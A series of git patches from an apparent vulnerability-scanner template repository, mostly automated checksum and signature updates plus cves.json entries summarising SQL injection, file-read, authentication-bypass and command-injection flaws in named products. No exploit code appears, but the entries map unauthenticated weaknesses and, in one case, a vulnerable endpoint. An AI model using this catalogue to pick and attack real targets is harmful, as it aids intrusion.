http/default-logins/cambium-networks/cambium-networks-default-login.yaml From c2497c00eb3df385a11eed74d88768267a2611ae Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 08:07:19 +0000 Subject: [PATCH 686/847] Auto Generated Templates Checksum [Wed Jun 5 08:07:19 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 79de678485..6ad905acfb 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3226,7 +3226,7 @@ http/cves/2023/CVE-2023-6020.yaml:53d613fc898b341e0e4636b42bb596feabf64888 http/cves/2023/CVE-2023-6021.yaml:9f6d4772e7a300d8e9c4c5899e9e46bfc4a58082 http/cves/2023/CVE-2023-6023.yaml:3a730637eccac887e1162588d4f19076f1767008 http/cves/2023/CVE-2023-6038.yaml:45afe9e78f6b59a1cf80b02d2cd461f51a7274a7 -http/cves/2023/CVE-2023-6063.yaml:32096f6833a737d95a0ecdc8efd59c606fddd027 +http/cves/2023/CVE-2023-6063.yaml:76eb706150de84bbd373a6523c74be5b019a9dd6 http/cves/2023/CVE-2023-6065.yaml:b8808f0d626ba5e51da0c22de6f1b564455133e7 http/cves/2023/CVE-2023-6114.yaml:5dc0c50f0958887f67d7ed03075e3983350045fe http/cves/2023/CVE-2023-6360.yaml:ded41747153de73db0aa449ecfd1b3d32965f434 @@ -3261,6 +3261,7 @@ http/cves/2024/CVE-2024-1208.yaml:a64398099908496a14705ee1ea9a82ef498f471e http/cves/2024/CVE-2024-1209.yaml:83acee361fad278c37690439c442a8deef01cd3c http/cves/2024/CVE-2024-1210.yaml:7af2bde109e8f0dbb0af5f22cdbcfd5e2c0cc132 http/cves/2024/CVE-2024-1212.yaml:ff3afc7fa9564d0aadd7087edb0eb9e0fd329ffe +http/cves/2024/CVE-2024-1380.yaml:44cadd112c6f179322c827ee6a1fd8882418a0a4 http/cves/2024/CVE-2024-1561.yaml:659c9112fbbf202496c98637b8ffcfd2665024ab http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:3978d9abbcba91bb6b6fe4cf6130cc35695bd1b8 @@ -3317,7 +3318,7 @@ http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-3822.yaml:3b09a61773b3f696a26e7a152cfa5d1968aa9dc8 http/cves/2024/CVE-2024-4040.yaml:9470254ef11bec4f99022dac385a6198071a2cad http/cves/2024/CVE-2024-4348.yaml:82d6d18aedb35323e1c359a8467f30ab49a8aae9 -http/cves/2024/CVE-2024-4358.yaml:fbc541e9790dac108af524828c9e196d7c640e9a +http/cves/2024/CVE-2024-4358.yaml:e64b958f2da8291fef4dee711db632c9f4e6cea0 http/cves/2024/CVE-2024-4956.yaml:a00f92400517494320ec968d237c98bb1056de25 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 @@ -7771,7 +7772,7 @@ http/vulnerabilities/other/dss-download-fileread.yaml:99d5bcf47324083def79e63def http/vulnerabilities/other/duomicms-sql-injection.yaml:ee36f8e9e2bfda358c4851065c331d9988f55537 http/vulnerabilities/other/dzzoffice-xss.yaml:8e89cae5618ff076d9bdadce356bb4ae547844d4 http/vulnerabilities/other/eaa-app-lfi.yaml:97b0823d04ad3588ce93c66dd73c78dff743f1be -http/vulnerabilities/other/easycvr-info-leak.yaml:2857e400b48c9919fa9c889bb46b59318e0bc45e +http/vulnerabilities/other/easycvr-info-leak.yaml:4a339e7ca4c5dbec8db0c3f71ab8d9c47f503e6b http/vulnerabilities/other/easyimage-downphp-lfi.yaml:c13b2da7bd29bd39b5c0e7b09d94a864c38367ac http/vulnerabilities/other/ecology-oa-file-sqli.yaml:6ac7efef6739bb5063e9b1787fe1c6120048a56a http/vulnerabilities/other/ecshop-sqli.yaml:151963cca04a4163b76e6ff7021db99290abc406 @@ -8628,7 +8629,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:962b4f3fd05cbcfe528d0fd64adcfec423f635b8 +templates-checksum.txt:aff5e83e62003a482a3e2fd3953540715cbe5809 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d5dae49a64bdd7e662197d4633bed77cd43398c2 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 08:07:23 +0000 Subject: [PATCH 687/847] Auto Generated cves.json [Wed Jun 5 08:07:23 UTC 2024] :robot: --- cves.json | 5 +++-- cves.json-checksum.txt | 2 +- 2 files changed, 4 insertions(+), 3 deletions(-) diff --git a/cves.json b/cves.json index 0d999c385b..5c9f03048a 100644 --- a/cves.json +++ b/cves.json @@ -2329,7 +2329,7 @@ {"ID":"CVE-2023-6021","Info":{"Name":"Ray API - Local File Inclusion","Severity":"high","Description":"LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6021.yaml"} {"ID":"CVE-2023-6023","Info":{"Name":"VertaAI ModelDB - Path Traversal","Severity":"high","Description":"The endpoint \"/api/v1/artifact/getArtifact?artifact_path=\" is vulnerable to path traversal. The main cause of this vulnerability is due to the lack of validation and sanitization of the artifact_path parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6023.yaml"} {"ID":"CVE-2023-6038","Info":{"Name":"H2O ImportFiles - Local File Inclusion","Severity":"high","Description":"An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6038.yaml"} -{"ID":"CVE-2023-6063","Info":{"Name":"WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection","Severity":"high","Description":"The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6063.yaml"} +{"ID":"CVE-2023-6063","Info":{"Name":"WP Fastest Cache 1.2.2 - SQL Injection","Severity":"high","Description":"The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6063.yaml"} {"ID":"CVE-2023-6065","Info":{"Name":"Quttera Web Malware Scanner \u003c= 3.4.1.48 - Sensitive Data Exposure","Severity":"medium","Description":"The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-6065.yaml"} {"ID":"CVE-2023-6114","Info":{"Name":"Duplicator \u003c 1.5.7.1; Duplicator Pro \u003c 4.5.14.2 - Unauthenticated Sensitive Data Exposure","Severity":"high","Description":"The Duplicator WordPress plugin before 1.5.7.1, Duplicator Pro WordPress plugin before 4.5.14.2 does not disallow listing the `backups-dup-lite/tmp` directory (or the `backups-dup-pro/tmp` directory in the Pro version), which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to discover and access these sensitive files, which include a full database dump and a zip archive of the site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6114.yaml"} {"ID":"CVE-2023-6360","Info":{"Name":"WordPress My Calendar \u003c3.4.22 - SQL Injection","Severity":"critical","Description":"WordPress My Calendar plugin versions before 3.4.22 are vulnerable to an unauthenticated SQL injection within the 'from' and 'to' parameters of the '/my-calendar/v1/events' REST route.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6360.yaml"} @@ -2382,7 +2382,7 @@ {"ID":"CVE-2024-2389","Info":{"Name":"Progress Kemp Flowmon - Command Injection","Severity":"critical","Description":"In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-2389.yaml"} {"ID":"CVE-2024-23917","Info":{"Name":"JetBrains TeamCity \u003e 2023.11.3 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-23917.yaml"} {"ID":"CVE-2024-24131","Info":{"Name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","Severity":"medium","Description":"SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-24131.yaml"} -{"ID":"CVE-2024-24919","Info":{"Name":"Check Point Quantum Gateway - Information Disclosure","Severity":"high","Description":"CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-24919.yaml"} +{"ID":"CVE-2024-24919","Info":{"Name":"Check Point Quantum Gateway - Information Disclosure","Severity":"high","Description":"CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-24919.yaml"} {"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"} {"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"} {"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"} @@ -2420,6 +2420,7 @@ {"ID":"CVE-2024-3822","Info":{"Name":"Base64 Encoder/Decoder \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-3822.yaml"} {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} +{"ID":"CVE-2024-4358","Info":{"Name":"Progress Telerik Report Server - Authentication Bypass","Severity":"critical","Description":"In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4358.yaml"} {"ID":"CVE-2024-4956","Info":{"Name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","Severity":"high","Description":"Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-4956.yaml"} {"ID":"CVE-2024-5230","Info":{"Name":"FleetCart 4.1.1 - Information Disclosure","Severity":"medium","Description":"Issues with information disclosure in redirect responses. Accessing the majority of the website's pages exposes sensitive data, including the \"Razorpay\" \"razorpayKeyId\".\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-5230.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index b9cdde8cf7..16dc2bfc76 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -d337d7264c683ea11584b411b8bcb172 +7bfe54c4491f1002937ca044e92d59d7 From 4df137b5f2993bc5320dca36e04921a9ccd8a603 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 5 Jun 2024 08:08:04 +0000 Subject: [PATCH 688/847] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ec16888164..0a94ae4d07 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,12 +11,14 @@ on: - 'http/cves/2023/CVE-2023-2059.yaml' - 'http/cves/2023/CVE-2023-3077.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' + - 'http/cves/2024/CVE-2024-1380.yaml' - 'http/cves/2024/CVE-2024-21683.yaml' - 'http/cves/2024/CVE-2024-24919.yaml' - 'http/cves/2024/CVE-2024-27348.yaml' - 'http/cves/2024/CVE-2024-34470.yaml' - 'http/cves/2024/CVE-2024-3495.yaml' - 'http/cves/2024/CVE-2024-3822.yaml' + - 'http/cves/2024/CVE-2024-4358.yaml' - 'http/cves/2024/CVE-2024-5230.yaml' - 'http/default-logins/ampjuke-default-login.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' From 73e329ffbd58f0defc0098ca95fb9d6f0e52dbb8 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 08:08:43 +0000 Subject: [PATCH 689/847] Auto Template Signing [Wed Jun 5 08:08:43 UTC 2024] :robot: --- http/cves/2023/CVE-2023-6063.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index 7be5b08cdb..a8d8042f29 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -64,3 +64,4 @@ http: - 'status_code == 200' - 'contains(body, "/wp-")' condition: and +# digest: 4a0a00473045022004cfaae0dc548a746f2ac8518775b253ea274661021c3b7f22759e9d709b8ee6022100843555767a7cac5718662e92a81db100fec5216a00af6868223053d1470dfedf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 951efcacafb117ac20ca0062a303b7f5004cd02e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 5 Jun 2024 13:39:12 +0530 Subject: [PATCH 690/847] lint fix --- http/exposed-panels/f5-admin-interface.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/f5-admin-interface.yaml b/http/exposed-panels/f5-admin-interface.yaml index 1564a48062..abe15f36d8 100644 --- a/http/exposed-panels/f5-admin-interface.yaml +++ b/http/exposed-panels/f5-admin-interface.yaml @@ -4,9 +4,9 @@ info: name: F5 Admin Interface - Detect author: drewvravick severity: high - description: + description: | Detects F5 Admin Interfaces. - tags: f5,admin,detection + tags: f5,admin,detect,panel,login http: - method: GET From fb8d4d32f31fa1e07dbc23620d7ae94524477bf8 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 08:11:57 +0000 Subject: [PATCH 692/847] Auto Generated Templates Checksum [Wed Jun 5 08:11:57 UTC 2024] :robot: --- templates-checksum.txt | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6ad905acfb..87f400ca13 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:ee679e39399a1034603fc71366f0ce86effc9394 -cves.json-checksum.txt:0650e06b1d0806329262c0f0bb6b558ddd1ac707 +cves.json:dc9bafb46fe914a031c1ee639a2fea1995c67454 +cves.json-checksum.txt:e35d1b788a97940d595aee8ff549b6104ea3f682 dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3226,7 +3226,7 @@ http/cves/2023/CVE-2023-6020.yaml:53d613fc898b341e0e4636b42bb596feabf64888 http/cves/2023/CVE-2023-6021.yaml:9f6d4772e7a300d8e9c4c5899e9e46bfc4a58082 http/cves/2023/CVE-2023-6023.yaml:3a730637eccac887e1162588d4f19076f1767008 http/cves/2023/CVE-2023-6038.yaml:45afe9e78f6b59a1cf80b02d2cd461f51a7274a7 -http/cves/2023/CVE-2023-6063.yaml:76eb706150de84bbd373a6523c74be5b019a9dd6 +http/cves/2023/CVE-2023-6063.yaml:b776af7a38c9a9240931b1c106226cbe2efd7ed9 http/cves/2023/CVE-2023-6065.yaml:b8808f0d626ba5e51da0c22de6f1b564455133e7 http/cves/2023/CVE-2023-6114.yaml:5dc0c50f0958887f67d7ed03075e3983350045fe http/cves/2023/CVE-2023-6360.yaml:ded41747153de73db0aa449ecfd1b3d32965f434 @@ -7029,7 +7029,7 @@ http/technologies/swag-instance-default-page.yaml:d4643f41f726f357460d39fa02b869 http/technologies/switch-protocol.yaml:9e7d35889c050f18a43fdfd29498913b84878b6a http/technologies/synology-web-station.yaml:28d3a14c78cde632ddbed93de03148cffb1b3fb6 http/technologies/tableau-server-detect.yaml:6e0417d43e7d6773330d82b6088270c9004a8daa -http/technologies/tech-detect.yaml:9a412a58865301201466e8d67a25407470b4a3b3 +http/technologies/tech-detect.yaml:88a4087e262947836d1f890569453b5f27c17cc8 http/technologies/telerik/telerik-dialoghandler-detect.yaml:28ede6444f34199767b36a8317d80eb705805366 http/technologies/telerik/telerik-fileupload-detect.yaml:eb5db507fb5a1c3bfba3651c389c4e8b175ca2d1 http/technologies/teradici-pcoip.yaml:710bd965305a025c6f8793f5e3e13fa2117212ad @@ -8629,7 +8629,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:aff5e83e62003a482a3e2fd3953540715cbe5809 +templates-checksum.txt:a7ba8f07f5d0a8cf90eef9e1f5390b27416523f9 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ec057054d9555d1b3e2b2fb8401275fe76c3becd Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 08:12:44 +0000 Subject: [PATCH 693/847] Auto Generated cves.json [Wed Jun 5 08:12:44 UTC 2024] :robot: --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 5c9f03048a..027b2bde54 100644 --- a/cves.json +++ b/cves.json @@ -2364,6 +2364,7 @@ {"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"} {"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"} {"ID":"CVE-2024-1212","Info":{"Name":"Progress Kemp LoadMaster - Command Injection","Severity":"critical","Description":"Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1212.yaml"} +{"ID":"CVE-2024-1380","Info":{"Name":"Relevanssi (A Better Search) \u003c= 4.22.0 - Query Log Export","Severity":"medium","Description":"The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1380.yaml"} {"ID":"CVE-2024-1561","Info":{"Name":"Gradio Applications - Local File Read","Severity":"high","Description":"Local file read by calling arbitrary methods of Components class\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-1561.yaml"} {"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"} {"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 16dc2bfc76..a6bfebd6fa 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -7bfe54c4491f1002937ca044e92d59d7 +b850ce0a43b8e25fcc5d4b47a2edd438 From 99034eaadafdc7eca1bb3efc1a08d8c63fccef0d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 08:13:36 +0000 Subject: [PATCH 694/847] Auto Template Signing [Wed Jun 5 08:13:36 UTC 2024] :robot: --- http/cves/2024/CVE-2024-1380.yaml | 1 + http/technologies/tech-detect.yaml | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-1380.yaml b/http/cves/2024/CVE-2024-1380.yaml index 5a444936cd..eec639a063 100644 --- a/http/cves/2024/CVE-2024-1380.yaml +++ b/http/cves/2024/CVE-2024-1380.yaml @@ -38,3 +38,4 @@ http: - 'status_code == 200' - 'contains_all(header, "filename=relevanssi_log.csv", "application/download")' condition: and +# digest: 490a0046304402201272337c67a76b0203bc4aa653c317274fe8d6ad7253b664b827e1212dcc356202203920d9d81cf38c7d9c21315f113b82e9fdea0ff67cd19a6b5abf232ae55b2dda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/tech-detect.yaml b/http/technologies/tech-detect.yaml index 66215090c1..f2fb4138a7 100644 --- a/http/technologies/tech-detect.yaml +++ b/http/technologies/tech-detect.yaml @@ -3741,4 +3741,4 @@ http: words: - "X-ClickHouse-Summary" case-insensitive: true -# digest: 490a0046304402206435742292b7b33283b264123be82c44d4f4102132875d35561296cd0c603c9d02202578a061dcb35c3284cadf8c815d7831fce13d645643c27a1fcd779925f0e56c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220335ffdf06e8ba346d7f25bf71fe8261bb434d46c19271b7b5601a8904de6555f0221009fb1d6c0e83f0fb6d88dc2a05c80f15750ed9ff0c0b2c19a51e0983ddfbdb5cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b863517f2d7722db052c767ed56c01a57e53cd64 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 5 Jun 2024 13:46:50 +0530 Subject: [PATCH 695/847] FP -fix --- javascript/enumeration/rsync/rsync-list-modules.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/javascript/enumeration/rsync/rsync-list-modules.yaml b/javascript/enumeration/rsync/rsync-list-modules.yaml index c43f98be8d..a28adb1228 100644 --- a/javascript/enumeration/rsync/rsync-list-modules.yaml +++ b/javascript/enumeration/rsync/rsync-list-modules.yaml @@ -36,6 +36,12 @@ javascript: Host: "{{Host}}" Port: 873 + matchers: + - type: word + negative: true + words: + - "HTTP/1.1" + extractors: - type: dsl dsl: From 771867dd392982833715519a26b2efc59e9d2d66 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 5 Jun 2024 08:19:43 +0000 Subject: [PATCH 696/847] Auto Generated New Template Addition List [Wed Jun 5 08:19:43 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9d6d20d44f..e808f6e0c2 100644 --- a/.new-additions +++ b/.new-additions @@ -68,5 +68,6 @@ http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml http/vulnerabilities/other/easycvr-info-leak.yaml javascript/backdoor/proftpd-backdoor.yaml +javascript/enumeration/rsync/rsync-list-modules.yaml network/detection/bitvise-ssh-detect.yaml passive/cves/2024/CVE-2024-25723.yaml From 938477cfd54565f777eff7bd155a87e85173b40d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 08:19:46 +0000 Subject: [PATCH 697/847] Auto Generated Templates Checksum [Wed Jun 5 08:19:46 UTC 2024] :robot: --- templates-checksum.txt | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 87f400ca13..ad6d873402 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:dc9bafb46fe914a031c1ee639a2fea1995c67454 -cves.json-checksum.txt:e35d1b788a97940d595aee8ff549b6104ea3f682 +cves.json:7e57aa58a2dde22d0e60ebdfb0a10c00a2310cec +cves.json-checksum.txt:8866cb507164321fe99b89f58ef28da52a9cb13b dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 